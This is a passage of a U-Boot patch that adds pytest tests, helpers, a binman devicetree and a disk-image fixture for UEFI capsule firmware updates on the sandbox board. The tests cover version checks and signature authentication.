u_boot_console.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x181464af' in response + u_boot_console.run_command(cmd = 'exit', wait_for_echo=False) + + u_boot_console.run_command(cmd = 'efidebug boot add ' \ + '-B 0002 label-2 host 0:1 initrddump.efi ' \ + '-I host 0:1 initrd-2.img -s nocolor') + u_boot_console.run_command(cmd = 'efidebug boot dump') + u_boot_console.run_command(cmd = 'efidebug boot order 0002') + u_boot_console.run_command(cmd = 'bootefi bootmgr') + response = u_boot_console.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x811d3515' in response + u_boot_console.run_command(cmd = 'exit', wait_for_echo=False) + + u_boot_console.run_command(cmd = 'efidebug boot rm 0001') + u_boot_console.run_command(cmd = 'efidebug boot rm 0002') diff --git a/test/py/tests/test_efi_capsule/capsule_common.py b/test/py/tests/test_efi_capsule/capsule_common.py new file mode 100644 index 00000000000..fc0d851c619 --- /dev/null +++ b/test/py/tests/test_efi_capsule/capsule_common.py @@ -0,0 +1,142 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2023, Linaro Limited + + +"""Common function for UEFI capsule test.""" + +from capsule_defs import CAPSULE_DATA_DIR, CAPSULE_INSTALL_DIR + +def capsule_setup(u_boot_console, disk_img, osindications): + """setup the test + + Args: + u_boot_console -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + osindications -- String of osindications value. 
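+
+    Illustrative call (not part of the original patch):
+        capsule_setup(u_boot_console, disk_img, '0x0000000000000004')
+    sets the EFI_OS_INDICATIONS_FILE_CAPSULE_DELIVERY_SUPPORTED bit so that
+    capsule-on-disk processing runs on the next boot; passing None clears
+    OsIndications instead.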
+ """ + u_boot_console.run_command_list([ + f'host bind 0 {disk_img}', + 'printenv -e PlatformLangCodes', # workaround for terminal size determination + 'efidebug boot add -b 1 TEST host 0:1 /helloworld.efi', + 'efidebug boot order 1', + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"']) + + if osindications is None: + u_boot_console.run_command('env set -e OsIndications') + else: + u_boot_console.run_command(f'env set -e -nv -bs -rt OsIndications ={osindications}') + + u_boot_console.run_command('env save') + +def init_content(u_boot_console, target, filename, expected): + """initialize test content + + Args: + u_boot_console -- A console connection to U-Boot. + target -- Target address to place the content. + filename -- File name of the content. + expected -- Expected string of the content. + """ + output = u_boot_console.run_command_list([ + 'sf probe 0:0', + f'fatload host 0:1 4000000 {CAPSULE_DATA_DIR}/{filename}', + f'sf write 4000000 {target} 10', + 'sf read 5000000 100000 10', + 'md.b 5000000 10']) + assert expected in ''.join(output) + +def place_capsule_file(u_boot_console, filenames): + """place the capsule file + + Args: + u_boot_console -- A console connection to U-Boot. + filenames -- File name array of the target capsule files. + """ + for name in filenames: + u_boot_console.run_command_list([ + f'fatload host 0:1 4000000 {CAPSULE_DATA_DIR}/{name}', + f'fatwrite host 0:1 4000000 {CAPSULE_INSTALL_DIR}/{name} $filesize']) + + output = u_boot_console.run_command(f'fatls host 0:1 {CAPSULE_INSTALL_DIR}') + for name in filenames: + assert name in ''.join(output) + +def exec_manual_update(u_boot_console, disk_img, filenames, need_reboot = True): + """execute capsule update manually + + Args: + u_boot_console -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + filenames -- File name array of the target capsule files. + need_reboot -- Flag indicates whether system reboot is required. + """ + # make sure that dfu_alt_info exists even persistent variables + # are not available. + output = u_boot_console.run_command_list([ + 'env set dfu_alt_info ' + '"sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + f'host bind 0 {disk_img}', + f'fatls host 0:1 {CAPSULE_INSTALL_DIR}']) + for name in filenames: + assert name in ''.join(output) + + # need to run uefi command to initiate capsule handling + u_boot_console.run_command( + 'env print -e Capsule0000', wait_for_reboot = need_reboot) + +def check_file_removed(u_boot_console, disk_img, filenames): + """check files are removed + + Args: + u_boot_console -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + filenames -- File name array of the target capsule files. + """ + output = u_boot_console.run_command_list([ + f'host bind 0 {disk_img}', + f'fatls host 0:1 {CAPSULE_INSTALL_DIR}']) + for name in filenames: + assert name not in ''.join(output) + +def check_file_exist(u_boot_console, disk_img, filenames): + """check files exist + + Args: + u_boot_console -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + filenames -- File name array of the target capsule files. 
+ """ + output = u_boot_console.run_command_list([ + f'host bind 0 {disk_img}', + f'fatls host 0:1 {CAPSULE_INSTALL_DIR}']) + for name in filenames: + assert name in ''.join(output) + +def verify_content(u_boot_console, target, expected): + """verify the content + + Args: + u_boot_console -- A console connection to U-Boot. + target -- Target address to verify. + expected -- Expected string of the content. + """ + output = u_boot_console.run_command_list([ + 'sf probe 0:0', + f'sf read 4000000 {target} 10', + 'md.b 4000000 10']) + assert expected in ''.join(output) + +def do_reboot_dtb_specified(u_boot_config, u_boot_console, dtb_filename): + """do reboot with specified DTB + + Args: + u_boot_config -- U-boot configuration. + u_boot_console -- A console connection to U-Boot. + dtb_filename -- DTB file name. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_capsule' + u_boot_console.config.dtb = mnt_point + CAPSULE_DATA_DIR \ + + f'/{dtb_filename}' + u_boot_console.restart_uboot() diff --git a/test/py/tests/test_efi_capsule/capsule_defs.py b/test/py/tests/test_efi_capsule/capsule_defs.py new file mode 100644 index 00000000000..3cc695e29b5 --- /dev/null +++ b/test/py/tests/test_efi_capsule/capsule_defs.py @@ -0,0 +1,12 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Directoreis used for authentication and capsule tests.""" + +# Directories +CAPSULE_DATA_DIR = '/EFI/CapsuleTestData' +CAPSULE_INSTALL_DIR = '/EFI/UpdateCapsule' + +# v1.5.1 or earlier of efitools has a bug in sha256 calculation, and +# you need build a newer version on your own. +# The path must terminate with '/' if it is not null. +EFITOOLS_PATH = '' diff --git a/test/py/tests/test_efi_capsule/capsule_gen_binman.dts b/test/py/tests/test_efi_capsule/capsule_gen_binman.dts new file mode 100644 index 00000000000..e8a18585092 --- /dev/null +++ b/test/py/tests/test_efi_capsule/capsule_gen_binman.dts @@ -0,0 +1,321 @@ +// SPDX-License-Identifier: GPL-2.0+ +/* + * Devicetree for capsule generation through binman + */ + +/dts-v1/; + +#include <sandbox_efi_capsule.h> + +/ { + binman: binman { + multiple-images; + }; +}; + +&binman { + itb { + filename = UBOOT_FIT_IMAGE; + + fit { + description = "Automatic U-Boot environment update"; + #address-cells = <2>; + + images { + u-boot-bin { + description = "U-Boot binary on SPI Flash"; + compression = "none"; + type = "firmware"; + arch = "sandbox"; + load = <0>; + text { + text = "u-boot:New"; + }; + + hash-1 { + algo = "sha1"; + }; + }; + u-boot-env { + description = "U-Boot environment on SPI Flash"; + compression = "none"; + type = "firmware"; + arch = "sandbox"; + load = <0>; + text { + text = "u-boot-env:New"; + }; + + hash-1 { + algo = "sha1"; + }; + }; + }; + }; + }; + + capsule1 { + filename = "Test01"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_UBOOT_IMAGE_GUID; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule2 { + filename = "Test02"; + efi-capsule { + image-index = <0x2>; + image-guid = SANDBOX_UBOOT_ENV_IMAGE_GUID; + + text { + text = "u-boot-env:New"; + }; + }; + }; + + capsule3 { + filename = "Test03"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_INCORRECT_GUID; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule4 { + filename = "Test04"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule5 { + filename = "Test05"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_INCORRECT_GUID; + + blob { + filename = 
UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule6 { + filename = "Test101"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x5>; + image-guid = SANDBOX_UBOOT_IMAGE_GUID; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule7 { + filename = "Test102"; + efi-capsule { + image-index = <0x2>; + fw-version = <0xa>; + image-guid = SANDBOX_UBOOT_ENV_IMAGE_GUID; + + text { + text = "u-boot-env:New"; + }; + }; + }; + + capsule8 { + filename = "Test103"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x2>; + image-guid = SANDBOX_UBOOT_IMAGE_GUID; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule9 { + filename = "Test104"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x5>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule10 { + filename = "Test105"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x2>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule11 { + filename = "Test11"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_UBOOT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule12 { + filename = "Test12"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_UBOOT_IMAGE_GUID; + private-key = CAPSULE_INVAL_KEY; + public-key-cert = CAPSULE_INVAL_PUB_KEY; + monotonic-count = <0x1>; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule13 { + filename = "Test13"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule14 { + filename = "Test14"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_INVAL_KEY; + public-key-cert = CAPSULE_INVAL_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule15 { + filename = "Test111"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x5>; + image-guid = SANDBOX_UBOOT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule16 { + filename = "Test112"; + efi-capsule { + image-index = <0x2>; + fw-version = <0xa>; + image-guid = SANDBOX_UBOOT_ENV_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + text { + text = "u-boot-env:New"; + }; + }; + }; + + capsule17 { + filename = "Test113"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x2>; + image-guid = SANDBOX_UBOOT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule18 { + filename = "Test114"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x5>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule19 { + filename = "Test115"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x2>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; 
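+
+	/*
+	 * Summary annotation (not part of the original patch): Test01-Test05
+	 * are plain capsules, Test101-Test105 add fw-version fields,
+	 * Test11-Test14 are signed (Test12 and Test14 with the invalid key),
+	 * and Test111-Test115 combine signing with fw-version.
+	 */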
+}; diff --git a/test/py/tests/test_efi_capsule/conftest.py b/test/py/tests/test_efi_capsule/conftest.py new file mode 100644 index 00000000000..dd41da9284e --- /dev/null +++ b/test/py/tests/test_efi_capsule/conftest.py @@ -0,0 +1,104 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""Fixture for UEFI capsule test.""" + +import os + +from subprocess import call, check_call, CalledProcessError +import pytest +from capsule_defs import CAPSULE_DATA_DIR, CAPSULE_INSTALL_DIR, EFITOOLS_PATH + +@pytest.fixture(scope='session') +def efi_capsule_data(request, u_boot_config): + """Set up a file system and return path to image. + + The function sets up a file system to be used in UEFI capsule and + authentication test and returns a path to disk image to be used + for testing. + + request -- Pytest request object. + u_boot_config -- U-Boot configuration. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_capsule' + data_dir = mnt_point + CAPSULE_DATA_DIR + install_dir = mnt_point + CAPSULE_INSTALL_DIR + image_path = u_boot_config.persistent_data_dir + '/test_efi_capsule.img' + + try: + # Create a target device + check_call('dd if=/dev/zero of=./spi.bin bs=1MiB count=16', shell=True) + + check_call('rm -rf %s' % mnt_point, shell=True) + check_call('mkdir -p %s' % data_dir, shell=True) + check_call('mkdir -p %s' % install_dir, shell=True) + + capsule_auth_enabled = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + key_dir = u_boot_config.source_dir + '/board/sandbox' + if capsule_auth_enabled: + # Get the keys from the board directory + check_call('cp %s/capsule_priv_key_good.key %s/SIGNER.key' + % (key_dir, data_dir), shell=True) + check_call('cp %s/capsule_pub_key_good.crt %s/SIGNER.crt' + % (key_dir, data_dir), shell=True) + check_call('cp %s/capsule_pub_esl_good.esl %s/SIGNER.esl' + % (key_dir, data_dir), shell=True) + + check_call('cp %s/capsule_priv_key_bad.key %s/SIGNER2.key' + % (key_dir, data_dir), shell=True) + check_call('cp %s/capsule_pub_key_bad.crt %s/SIGNER2.crt' + % (key_dir, data_dir), shell=True) + + # Update dtb to add the version information + check_call('cd %s; ' + 'cp %s/test/py/tests/test_efi_capsule/version.dts .' 
+ % (data_dir, u_boot_config.source_dir), shell=True) + + if capsule_auth_enabled: + check_call('cd %s; ' + 'cp %s/arch/sandbox/dts/test.dtb test_sig.dtb' + % (data_dir, u_boot_config.build_dir), shell=True) + check_call('cd %s; ' + 'dtc -@ -I dts -O dtb -o version.dtbo version.dts; ' + 'fdtoverlay -i test_sig.dtb ' + '-o test_ver.dtb version.dtbo' + % (data_dir), shell=True) + else: + check_call('cd %s; ' + 'dtc -@ -I dts -O dtb -o version.dtbo version.dts; ' + 'fdtoverlay -i %s/arch/sandbox/dts/test.dtb ' + '-o test_ver.dtb version.dtbo' + % (data_dir, u_boot_config.build_dir), shell=True) + + # two regions: one for u-boot.bin and the other for u-boot.env + check_call('cd %s; echo -n u-boot:Old > u-boot.bin.old; echo -n u-boot:New > u-boot.bin.new; echo -n u-boot-env:Old > u-boot.env.old; echo -n u-boot-env:New > u-boot.env.new' % data_dir, + shell=True) + + pythonpath = os.environ.get('PYTHONPATH', '') + os.environ['PYTHONPATH'] = pythonpath + ':' + '%s/scripts/dtc/pylibfdt' % u_boot_config.build_dir + check_call('cd %s; ' + 'cc -E -I %s/include -x assembler-with-cpp -o capsule_gen_tmp.dts %s/test/py/tests/test_efi_capsule/capsule_gen_binman.dts; ' + 'dtc -I dts -O dtb capsule_gen_tmp.dts -o capsule_binman.dtb;' + % (data_dir, u_boot_config.source_dir, u_boot_config.source_dir), shell=True) + check_call('cd %s; ' + './tools/binman/binman --toolpath %s/tools build -u -d %s/capsule_binman.dtb -O %s -m --allow-missing -I %s -I ./board/sandbox -I ./arch/sandbox/dts' + % (u_boot_config.source_dir, u_boot_config.build_dir, data_dir, data_dir, data_dir), shell=True) + os.environ['PYTHONPATH'] = pythonpath + + # Create a disk image with EFI system partition + check_call('virt-make-fs --partition=gpt --size=+1M --type=vfat %s %s' % + (mnt_point, image_path), shell=True) + check_call('sgdisk %s -A 1:set:0 -t 1:C12A7328-F81F-11D2-BA4B-00A0C93EC93B' % + image_path, shell=True) + + except CalledProcessError as exception: + pytest.skip('Setup failed: %s' % exception.cmd) + return + else: + yield image_path + finally: + call('rm -rf %s' % mnt_point, shell=True) + call('rm -f %s' % image_path, shell=True) + call('rm -f ./spi.bin', shell=True) diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_fit.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_fit.py new file mode 100644 index 00000000000..11bcdc2bb29 --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_fit.py @@ -0,0 +1,183 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""U-Boot UEFI: Firmware Update Test +This test verifies capsule-on-disk firmware update for FIT images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox_flattree') +@pytest.mark.buildconfigspec('efi_capsule_firmware_fit') +@pytest.mark.buildconfigspec('efi_capsule_on_disk') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareFit(): + """Test capsule-on-disk firmware update for FIT images + """ + + def test_efi_capsule_fw1( + self, u_boot_config, u_boot_console, efi_capsule_data): + 
"""Test Case 1 + Update U-Boot and U-Boot environment on SPI Flash + but with an incorrect GUID value in the capsule + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + # other tests might have run and the + # system might not be in a clean state. + # Restart before starting the tests. + u_boot_console.restart_uboot() + + disk_img = efi_capsule_data + capsule_files = ['Test05'] + with u_boot_console.log.section('Test Case 1-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + init_content(u_boot_console, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + + # reboot + u_boot_console.restart_uboot(expect_reset = capsule_early) + + with u_boot_console.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # deleted anyway + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:Old') + verify_content(u_boot_console, '150000', 'u-boot-env:Old') + + def test_efi_capsule_fw2( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 2 + Update U-Boot and U-Boot environment on SPI Flash + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + + disk_img = efi_capsule_data + capsule_files = ['Test04'] + with u_boot_console.log.section('Test Case 2-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + init_content(u_boot_console, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + + # reboot + u_boot_console.restart_uboot(expect_reset = capsule_early) + + with u_boot_console.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + expected = 'u-boot:Old' if capsule_auth else 'u-boot:New' + verify_content(u_boot_console, '100000', expected) + + expected = 'u-boot-env:Old' if capsule_auth else 'u-boot-env:New' + verify_content(u_boot_console, '150000', expected) + + def test_efi_capsule_fw3( + self, u_boot_config, u_boot_console, efi_capsule_data): + """ Test Case 3 + Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test104'] + with u_boot_console.log.section('Test Case 3-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + init_content(u_boot_console, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + # reboot + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 
'config_efi_capsule_authenticate') + with u_boot_console.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # deleted anyway + check_file_removed(u_boot_console, disk_img, capsule_files) + + # make sure the dfu_alt_info exists because it is required for making ESRT. + output = u_boot_console.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + if capsule_auth: + # capsule authentication failed + verify_content(u_boot_console, '100000', 'u-boot:Old') + verify_content(u_boot_console, '150000', 'u-boot-env:Old') + else: + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '3673B45D-6A7C-46F3-9E60-ADABB03F7937' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + verify_content(u_boot_console, '100000', 'u-boot:New') + verify_content(u_boot_console, '150000', 'u-boot-env:New') + + def test_efi_capsule_fw4( + self, u_boot_config, u_boot_console, efi_capsule_data): + """ Test Case 4 + Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version + but fw_version is lower than lowest_supported_version + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test105'] + with u_boot_console.log.section('Test Case 4-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + # reboot + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_raw.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_raw.py new file mode 100644 index 00000000000..a5b5c8a3853 --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_raw.py @@ -0,0 +1,229 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +""" U-Boot UEFI: Firmware Update Test +This test verifies capsule-on-disk firmware update for raw images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + check_file_exist, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_capsule_firmware_raw') +@pytest.mark.buildconfigspec('efi_capsule_on_disk') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareRaw: + """ Tests verifying capsule-on-disk firmware update for raw images + """ + + def test_efi_capsule_fw1( + self, u_boot_config, u_boot_console, 
efi_capsule_data): + """ Test Case 1 + Update U-Boot and U-Boot environment on SPI Flash + but with an incorrect GUID value in the capsule + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + + # other tests might have run and the + # system might not be in a clean state. + # Restart before starting the tests. + u_boot_console.restart_uboot() + + disk_img = efi_capsule_data + capsule_files = ['Test03'] + with u_boot_console.log.section('Test Case 1-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + init_content(u_boot_console, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + # reboot + u_boot_console.restart_uboot() + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + + with u_boot_console.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # deleted anyway + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:Old') + verify_content(u_boot_console, '150000', 'u-boot-env:Old') + + def test_efi_capsule_fw2( + self, u_boot_config, u_boot_console, efi_capsule_data): + """ Test Case 2 + Update U-Boot and U-Boot environment on SPI Flash but with OsIndications unset + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test01', 'Test02'] + with u_boot_console.log.section('Test Case 2-a, before reboot'): + capsule_setup(u_boot_console, disk_img, None) + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + init_content(u_boot_console, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + # reboot + u_boot_console.restart_uboot() + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files, False) + + check_file_exist(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:Old') + verify_content(u_boot_console, '150000', 'u-boot-env:Old') + + def test_efi_capsule_fw3( + self, u_boot_config, u_boot_console, efi_capsule_data): + """ Test Case 3 + Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test01', 'Test02'] + with u_boot_console.log.section('Test Case 3-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + init_content(u_boot_console, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + + # reboot + u_boot_console.restart_uboot(expect_reset = capsule_early) + + with u_boot_console.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # make sure the dfu_alt_info exists because it is required for making ESRT. 
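+            # The value below maps the two dummy firmware regions onto the
+            # sandbox SPI flash using the DFU notation
+            # '<name> raw <offset> <size>', with entries separated by ';'.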
+            output = u_boot_console.run_command_list([
+                'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;u-boot-env raw 0x150000 0x200000"',
+                'efidebug capsule esrt'])
+
+            # ensure that SANDBOX_UBOOT_ENV_IMAGE_GUID is in the ESRT.
+            assert '5A7021F5-FEF2-48B4-AABA-832E777418C0' in ''.join(output)
+
+            # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT.
+            assert '09D7CF52-0720-4710-91D1-08469B7FE9C8' in ''.join(output)
+
+            check_file_removed(u_boot_console, disk_img, capsule_files)
+
+            expected = 'u-boot:Old' if capsule_auth else 'u-boot:New'
+            verify_content(u_boot_console, '100000', expected)
+
+            expected = 'u-boot-env:Old' if capsule_auth else 'u-boot-env:New'
+            verify_content(u_boot_console, '150000', expected)
+
+    def test_efi_capsule_fw4(
+            self, u_boot_config, u_boot_console, efi_capsule_data):
+        """ Test Case 4
+        Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version
+        0x100000-0x150000: U-Boot binary (but dummy)
+        0x150000-0x200000: U-Boot environment (but dummy)
+        """
+        disk_img = efi_capsule_data
+        capsule_files = ['Test101', 'Test102']
+        with u_boot_console.log.section('Test Case 4-a, before reboot'):
+            capsule_setup(u_boot_console, disk_img, '0x0000000000000004')
+            init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old')
+            init_content(u_boot_console, '150000', 'u-boot.env.old', 'Old')
+            place_capsule_file(u_boot_console, capsule_files)
+
+        # reboot
+        do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb')
+
+        capsule_early = u_boot_config.buildconfig.get(
+            'config_efi_capsule_on_disk_early')
+        capsule_auth = u_boot_config.buildconfig.get(
+            'config_efi_capsule_authenticate')
+        with u_boot_console.log.section('Test Case 4-b, after reboot'):
+            if not capsule_early:
+                exec_manual_update(u_boot_console, disk_img, capsule_files)
+
+            # deleted anyway
+            check_file_removed(u_boot_console, disk_img, capsule_files)
+
